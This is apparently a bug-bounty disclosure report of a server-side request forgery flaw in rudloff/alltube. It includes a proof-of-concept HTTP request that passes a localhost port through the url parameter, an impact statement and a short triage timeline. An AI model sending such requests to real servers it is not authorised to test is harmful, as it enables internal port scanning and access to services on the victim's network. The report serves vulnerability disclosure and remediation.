Server-Side Request Forgery (SSRF) in rudloff/alltube
Valid
Reported on
Feb 26th 2022
Description
Alltube takes URL from the query parameter and directly uses it in the youtube-dl command, It makes any unauthenticated attacker can perform an SSRF attack and pass internal hostnames in the URL parameter and obtain information about that service from the response.
Proof of Concept
GET /alltube/index.php/info?url=http://127.0.0.1:22 HTTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/alltube/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=qcnp4gcfj3ni5c02u60ivovj0l
Connection: close
Impact
This vulnerability is capable of internal port scanning and obtaining sensitive information about services on localhost and sending requests to them.
Occurrences
We are processing your report and will contact the
rudloff/alltube
team within 24 hours.
3 months ago
We have contacted a member of the
rudloff/alltube
team and are waiting to hear back
3 months ago
Pierre Rudloff modified the report
3 months ago
The fix bounty has been dropped
DownloadController.php#L46
has been validated
to join this conversation